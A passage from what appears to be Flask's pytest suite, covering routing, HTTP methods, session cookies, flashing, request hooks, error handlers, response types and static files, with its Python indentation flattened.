@pytest.mark.parametrize("method", ["get", "post", "put", "delete", "patch"])
def test_method_route(app, client, method):
method_route = getattr(app, method)
client_method = getattr(client, method)
@method_route("/")
def hello():
return "Hello"
assert client_method("/").data == b"Hello"
def test_method_route_no_methods(app):
with pytest.raises(TypeError):
app.get("/", methods=["GET", "POST"])
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added
# when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware:
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
@app.route("/clear")
def clear():
flask.session.pop("testing", None)
return "Goodbye World"
rv = client.get("/clear", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "session=;" in cookie
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "'localhost' is not a valid cookie domain" in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return str(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash("Hello World")
flask.flash("Hello World", "error")
flask.flash(flask.Markup("<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
"Hello World",
"Hello World",
flask.Markup("<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", "Hello World"),
("error", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", "Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == "Hello World"
assert messages[1] == flask.Markup("<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_403(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if _trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if _trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for _trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert "This was submitted: 'index.txt'" in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return "Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return "Hällo Wörld".encode()
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response(
"Hello world", 404, {"Content-Type": "text/html", "X-Foo": "Baz"}
),
{"Content-Type": "text/plain", "X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route("/dict")
def from_dict():
return {"foo": "bar"}, 201
assert client.get("/text").data == "Hällo Wörld".encode()
assert client.get("/bytes").data == "Hällo Wörld".encode()
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.content_type == "text/plain"
assert rv.headers.getlist("X-Foo") == ["Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get("/dict")
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e.value)
assert "from_none" in str(e.value)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e.value)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e.value)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder="", static_url_path="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_pathlib_path(app):
from pathlib import Path
app = flask.Flask(__name__, static_folder=Path("static"))
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_ending_slash():
app = flask.Flask(__name__, static_folder="static/")
@app.route("/<path:path>")
def catch_all(path):
return path
rv = app.test_client().get("/catch/all")
assert rv.data == b"catch/all"
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder
# but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host
# but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 0.15 warning about name mismatch
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore", "Current server name", UserWarning, "flask.app"
)
rv = client.get("/", "http://foo.localhost")
